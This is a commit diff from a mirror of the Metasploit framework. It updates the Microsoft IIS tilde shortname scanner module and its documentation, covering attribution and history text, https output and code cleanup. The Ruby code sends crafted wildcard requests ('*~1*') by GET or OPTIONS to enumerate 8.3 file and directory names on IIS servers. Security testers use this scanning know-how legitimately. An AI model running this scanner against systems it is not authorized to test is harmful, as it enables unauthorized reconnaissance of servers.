infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

fixes

GSoC/Meterpreter_Web_Console
root 2018-09-21 17:16:04 +00:00
parent 552ff027cd
commit 17c7d828c1
2 changed files with 38 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
View File

@ -1,8 +1,7 @@
## Microsoft IIS shortname vulnerability scanner ## Microsoft IIS shortname vulnerability scanner
The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to diclose 8.3 filenames (short names). This is a new technique for an existing bug (CVE-2009-4444), which relied on the use of the ;(semicolon) character. Soroush Dalili discovered the original bug, while the new ~ technique was discovered by Soroush Dalili and Ali Abbasnejad. The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
## Vulnerable Application ## Vulnerable Application
@ -60,6 +59,5 @@ Create registry key NtfsDisable8dot3NameCreation at HKLM\SYSTEM\CurrentControlSe
## References ## References
CVE-2009-4444
https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/ https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability

77
modules/auxiliary/scanner/http/iis_shortname_scanner.rb
View File

@ -15,17 +15,17 @@ class MetasploitModule < Msf::Auxiliary
info, info,
'Name' => 'Microsoft IIS shortname vulnerability scanner', 'Name' => 'Microsoft IIS shortname vulnerability scanner',
'Description' => %q{ 'Description' => %q{
'The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which
could allow remote attackers to diclose 8.3 filenames (short names). This is a new could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili
technique for an existing bug (CVE-2009-4444), which relied on the use of the ;(semicolon) and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in
character. Soroush Dalili discovered the original bug, while the new ~ technique was 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
discovered by Soroush Dalili and Ali Abbasnejad. Older IIS installations are vulnerable
with GET, newer installations with OPTIONS'
}, },
'Author' => 'Author' =>
[ [
'MinatoTW <shaks19jais[at]gmail.com>', 'Soroush Dalili', # Vulnerability discovery
'egre55 <ianaustin[at]protonmail.com>' 'Ali Abbasnejad', # Vulnerability discovery
'MinatoTW <shaks19jais[at]gmail.com>', # Metasploit module
'egre55 <ianaustin[at]protonmail.com>' # Metasploit module
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
@ -84,31 +84,31 @@ class MetasploitModule < Msf::Auxiliary
end end
def is_vul def is_vul
for method in ['GET', 'OPTIONS'] for method in ['GET', 'OPTIONS']
res1 = send_request_cgi({ res1 = send_request_cgi({
'uri' => normalize_uri(datastore['PATH'], '*~1*'), 'uri' => normalize_uri(datastore['PATH'], '*~1*'),
'method' => method 'method' => method
}) })
res2 = send_request_cgi({ res2 = send_request_cgi({
'uri' => normalize_uri(datastore['PATH'],'QYKWO*~1*'), 'uri' => normalize_uri(datastore['PATH'],'QYKWO*~1*'),
'method' => method 'method' => method
}) })
if res1.code == 404 && res2.code != 404 if res1.code == 404 && res2.code != 404
vuln = 1 vuln = 1
@verb = method @verb = method
break break
end
end
if vuln == 1
return true
else
return false
end end
end
if vuln == 1
return true
else
return false
end
rescue Rex::ConnectionError rescue Rex::ConnectionError
print_bad("Failed to connect to target") print_bad("Failed to connect to target")
end end
def get_status(f , digit , match) def get_status(f , digit , match)
res2 = send_request_cgi({ res2 = send_request_cgi({
@ -155,7 +155,6 @@ class MetasploitModule < Msf::Auxiliary
for c in @found2 for c in @found2
@queue_ext << (f + c ) @queue_ext << (f + c )
end end
else
end end
end end
end end
@ -251,30 +250,28 @@ class MetasploitModule < Msf::Auxiliary
@threads << Thread.new { scan } @threads << Thread.new { scan }
} }
sleep(1) until @queue_ext.empty? Rex.sleep(1) until @queue_ext.empty?
@threads.each(&:join) @threads.each(&:join)
proto = datastore['SSL'] ? 'https' : 'http'
if @dirs.empty? if @dirs.empty?
print_status("No directories were found") print_status("No directories were found")
else else
print_good("Directories found") print_good("Found #{@dirs.size} directories")
@dirs.each do |x| @dirs.each do |x|
print_line("http://#{datastore['RHOST']}#{datastore['PATH']}#{x}") print_line("#{proto}://#{datastore['RHOST']}#{datastore['PATH']}#{x}")
end end
end end
if @files.empty? if @files.empty?
print_status("No files were found") print_status("No files were found")
else else
print_good("Files found") print_good("Found #{@files.size} files")
@files.each do |x| @files.each do |x|
print_line("http://#{datastore['RHOST']}#{datastore['PATH']}#{x}") print_line("#{proto}://#{datastore['RHOST']}#{datastore['PATH']}#{x}")
end end
end end
end end
end end